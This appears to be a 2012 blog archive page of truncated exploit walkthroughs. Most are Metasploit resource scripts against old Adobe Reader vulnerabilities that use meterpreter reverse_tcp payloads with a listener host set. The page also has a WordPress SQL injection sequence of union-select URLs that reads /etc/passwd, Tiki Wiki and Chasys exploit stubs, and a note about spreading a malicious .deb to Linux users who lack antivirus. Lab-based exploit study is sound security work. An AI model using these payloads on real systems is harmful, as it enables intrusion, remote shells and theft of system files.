Monthly Archives: July 2012

video-evil_deb

The video has already been uploaded to Dropbox. You can replace it with any *.deb (we mean the source *.deb). Most importantly, many Linux users run without antivirus.


Windows/fileformat/adobe_cooltype_sing

Vulnerability Reference: CVE-2010-2883, OSVDB-67849
Attacker Info: OS: BT5 R2; Metasploit version: Framework 4.4.0-dev.15637, Console 4.4.0-dev.15613
Victim Info: OS: Windows XP SP3; Adobe Reader: 9.0 en
Step:
1. Craft a malicious PDF file and spread it out.
==================Exploit.rc======================
use exploit/windows/fileformat/adobe_cooltype_sing
set LHOST 192.168.100.230
set … Continue reading


windows/fileformat/adobe_utilprint

C This PoC was written for educational purposes only. Use it at your own risk. Author will not be responsible for any.
=========================================
victim : bt5 r2
attack m : win xp Chinese sp3
=================rc========================
use windows/fileformat/adobe_utilprint
set payload windows/meterpreter/reverse_tcp
… Continue reading


windows/fileformat/adobe_libtiff

C This PoC was written for educational purposes only. Use it at your own risk. Author will not be responsible for any.
=========================================
victim : bt5 r2
attack m : win xp Chinese sp3
=========================================
use windows/fileformat/adobe_libtiff
set payload windows/meterpreter/reverse_tcp
… Continue reading


exploit/windows/fileformat/adobe_jbig2decode

C This PoC was written for educational purposes only. Use it at your own risk. Author will not be responsible for any.
=========================================
victim : bt5 r2
attack m : bt5 r2
==================rc =======================
use exploit/windows/fileformat/adobe_jbig2decode
set payload windows/meterpreter/reverse_tcp
show … Continue reading


exploit/windows/fileformat/adobe_geticon

C This PoC was written for educational purposes only. Use it at your own risk. Author will not be responsible for any.
=========================================
victim : bt5 r2
attack m : bt5 r2
===================rc ======================
use exploit/windows/fileformat/adobe_geticon
set payload windows/meterpreter/reverse_tcp
show … Continue reading


exploit/windows/fileformat/adobe_collectemailinfo

C This PoC was written for educational purposes only. Use it at your own risk. Author will not be responsible for any.
=========================================
victim : bt5 r2
attack m : bt5 r2
====================  rc =====================
use exploit/windows/fileformat/adobe_collectemailinfo
set payload windows/meterpreter/reverse_tcp
… Continue reading


WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

The video has already been uploaded to Dropbox.
/////////////////////////////////////
//////////////////////////////////////
admin 4debb7
cd /pentest/web/wpscan/
./wpscan.rb --url http://192.168.94.128/wordpress
http://192.168.94.128/wordpress/index.php?cat=0 union select 1,2,3,4,5
http://192.168.94.128/wordpress/index.php?cat=0 union select 1,version(),3,4,5
http://192.168.94.128/wordpress/index.php?cat=0 union select 1,user(),3,4,5
http://192.168.94.128/wordpress/index.php?cat=0 union select 1,database(),3,4,5
http://192.168.94.128/wordpress/index.php?cat=0 union select 1,load_file(/etc/passwd),3,4,5
root@bt:~# echo -n /etc/passwd | xxd … Continue reading


Tiki Wiki <= 8.3 unserialize() PHP Code Execution

C This PoC was written for educational purposes only. Use it at your own risk. Author will not be responsible for any.
=========================================
victim 1: bt5 r2
v2 : metasploitable v2.0
v3: bt5 r1
attack m : bt5 r2
=========================================
… Continue reading


Chasys Media Player 2.0 Buffer Overflow Exploit (SEH)

B This PoC was written for educational purposes only. Use it at your own risk. Author will not be responsible for any.
=========================================
victim : win xp sp3
attack m : bt5 r2
=========================================
===================================
exp info v M back … Continue reading
